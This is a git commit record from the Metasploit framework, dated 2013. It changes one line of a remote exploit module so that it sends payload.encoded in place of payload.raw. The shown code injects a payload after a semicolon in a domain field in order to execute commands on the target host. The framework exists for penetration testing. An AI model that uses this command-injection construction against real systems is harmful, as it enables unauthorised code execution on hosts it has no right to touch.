Use payload.encoded because BadChars are defined

bug/bundler_fix
jvazquez-r7 2013-09-18 13:03:35 -05:00
parent dc9246a770
commit accad24f31
1 changed files with 1 additions and 1 deletions

View File

@ -85,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
print_status("#{rhost}:#{rport} - Executing payload...")
url = "http://www.#{rand_text_alpha(10 + rand(10))}.com"
domain = "http://#{rand_text_alpha(10 + rand(10))}.com;#{payload.raw}"
domain = "http://#{rand_text_alpha(10 + rand(10))}.com;#{payload.encoded}"
# very short timeout because the request may never return if we're
# sending a socket payload
send_exploit_query(url, domain, 0.01)